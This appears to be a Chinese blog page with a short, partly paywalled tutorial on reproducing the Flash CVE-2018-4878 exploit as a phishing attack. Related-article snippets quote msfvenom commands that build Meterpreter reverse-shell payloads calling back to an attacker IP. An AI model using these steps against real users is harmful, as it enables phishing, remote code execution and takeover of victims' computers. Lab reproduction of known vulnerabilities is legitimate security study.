Flash cve-2018-4878漏洞复现

最新推荐文章于 2020-10-27 11:44:46 发布
最新推荐文章于 2020-10-27 11:44:46 发布
阅读量400 收藏
点赞数
分类专栏: 网络安全 文章标签: shell web windows python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43268670/article/details/107207064
版权
本文详细介绍了如何复现Flash CVE-2018-4878漏洞,该漏洞针对Flash版本<=28和IE浏览器内核。尽管存在一定局限性,但通过将恶意Flash打包到Excel中,仍可能产生意想不到的效果。复现步骤包括使用特定版本的Flash,搭建web服务器,利用Kali Linux和Python脚本生成shellcode,并通过Metasploit进行进程迁移,以保持shell的持久性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

需要flash版本<=28,ie浏览器内核,有点鸡肋,但是可以打包到excel中,用的好也有奇效。

本文讲解web flash钓鱼

 

需要工具:

flash安装包<=28版本

web服务器

kali+python利用脚本

复现:

先用kali生成一个shellcode

文本打开复制全部

下载python脚本      https://github.com/anbai-inc/CVE-2018-4878

把生成脚本里面的buf变量替换成shellcode里面的buf

在脚本最下方改生成路径

最低0.47元/天 解锁文章
CVE-2018-4878 flash 漏洞利用教程
alert['Hello World']
10-25 1736
目录漏洞描述漏洞检测漏洞利用漏洞加固参考链接 漏洞描述 漏洞检测 漏洞利用 漏洞加固 参考链接
Flash漏洞CVE-2018-4878复现
玄道的网安博客
07-29 1489
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
CVE-2018-4878复现
大方子
10-07 4619
前言: CVE-2018-4878利用flash漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1201
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
CVE-2018-4878 flash漏洞复现
wh1te 小白的博客
10-22 1274
先将cve-2018-4878拖入虚拟机中 使用msfvenom生成shell代码 lhost为攻击机ip地址  lport为自定义端口号 查看代码文件  进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件 将上面msfvenom生成的代码覆盖掉原来的代码: 确认CVE-2018-4878.py下面的文件信息(后面会用到,之后保存...
Flash 0day漏洞CVE-2018-5002)千万不要乱打开Excel文档!
网站安全专家
06-09 1427
腾讯御见威胁情报中心近日监控到一例使用Adobe Flash 0day漏洞CVE-2018-5002)的APT攻击,攻击者疑通过即时聊天工具和邮箱等把恶意Excel文档发送给目标人员,诱骗目标人员打开文档。实际上,该恶意Excel文档经过特别构造,被嵌入了flash对象,用户一旦打开文档电脑就会中毒。CVE-2018-5002影响Adobe Flash Player 29.0.0.171及所有之...
cve-2018-4878漏洞复现
06-02 4713
靶机:Windows7 sp1 条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行) 所需工具已上传 kali:192.168.43.16 (需要输入的命令均用&lt;&gt;标记出来,&lt;&gt;不需要输入) 准备工作: kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量...
海康威视(Hikvision)大规模代码执行漏洞 数万监控设备存风险
热门推荐
一点一滴积累!
04-01 3万+
1. 更新情况 2014年11月19日,海康威视(Hikvision)监控设备被爆严重漏洞,具体编号为CVE-2014-4878CVE-2014-4879和CVE-2014-4880。这三个漏洞都是由于Hikvision监控设备对RTSP(实时流传输协议)请求处理不当导致的,通过该漏洞攻击者可以对设备进行DoS,甚至直接获取设备的最高权限。2. 漏洞概要 a) 漏洞描述 海
揭秘:海康威视的“棱镜门”不是弱密码问题
weixin_33756418的博客
08-10 1234
羊年春晚大幕刚落,信息安全大戏即开唱。这两天新闻媒体铺天盖地报道的海康设备被境外IP地址控制事件(堪称“棱镜门”事件第二),让挣扎于年后综合症的国人们一下子又热闹开了。“棱镜门”这个词再次进入大众视野。 事件起源于江苏公安厅下发的一份名为《关于立即对全省海康威视监控设备进行全面清查和安全加固的通知》。文件指出海康威视的监控设备存在严重安全隐患...
复现漏洞Flash 0day漏洞(CVE-2018-4878)时翻车
t_i_m_e的博客
04-22 993
i春秋有最近新出的flash 0day复现漏洞的步骤,需要用到kali环境,靶机环境以及web服务器环境,此漏洞官方目前还没有推出最新更新版本。步骤一:打开kali用msf生成一个kali虚拟机ip,任意端口的python脚本木马并保存为txt文件步骤二:在root文件夹下新建一个后缀为.py的文档然后将以下代码复制上去(复制大神的,我也不明白都是什么东西)#!/usr/bin/env pytho...
干货|常用渗透漏洞poc、exp收集整理
zhangge3663的博客
10-27 5048
...
[漏洞复现] CVE-2018-4878 Flash 0day
神仙哥哥的博客
05-23 2929
1、漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞CVE-2018-4878)。 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 直到2018年2月5号,Adboe才发布补丁来修复此0...
原来自己做的服务器漏洞是那么的多
星星之火,可以燎原
04-19 2046
最近有点空,突然有想法用扫描器来看看自己的服务器都什么漏洞没有,不扫不知道,一扫吓一跳,原来自己的服务器有那么多的漏洞,呵呵,还好这个服务器只对内部访问,上面没有什么重要的文件。怎么办,只能一样一样来设置,把相关的东西给屏蔽掉。我用的是XScan V3.3版本的扫描完成有如下信息提示212.66.32.225 MySql (3306/tcp) 发现安全提示 212.66.32.225 SUN RP
CVE-2018-4878
weixin_30702413的博客
03-15 80
0x00前言 该漏洞影响 Flash Player 版本28.0.0.137以及之前的所有版本 0x01 poc Poc 这里只列出关键代码 public function triggeruaf() : void { var sdk :PSDK = null; var dispatch:PSDKEventDispat...
CVE-2017-4878 漏洞复现Flash Player当前最新版本28.0.0.137以及之前的所有版本)
qq_39627497的博客
12-06 1413
CVE-2017-4878 漏洞复现 ** 漏洞介绍 ** 1、漏洞概述 Flash Player当前最新版本28.0.0.137以及之前的所有版本 2 漏洞复现环境: 渗透机:Kali Linux + POC代码 靶机:win7+IE8.0+FLASH player 为了节省时间直接在 GitHub上下载poc 代码 3 漏洞复现实验过程: 复制下载链接: git clone https://...
CVE-2014-4113 windows通杀本地提权0day
weixin_34092455的博客
10-19 292
这个0day的发现挺有意思的,是老外CrowdStrike 发现的,被老外监测程序发现显示从WEBSHELL使用Win64.exe来提升权限。 原文地址:http://blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane...
spring-CVE-2018-1270漏洞复现
最新发布
03-17
### Spring CVE-2018-1270 漏洞复现教程 #### 背景介绍 Spring Framework 是一个广泛使用的 Java 开发框架,提供了丰富的功能来简化企业级应用开发。然而,在某些版本中存在安全漏洞,可能导致远程代码执行 (RCE) ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值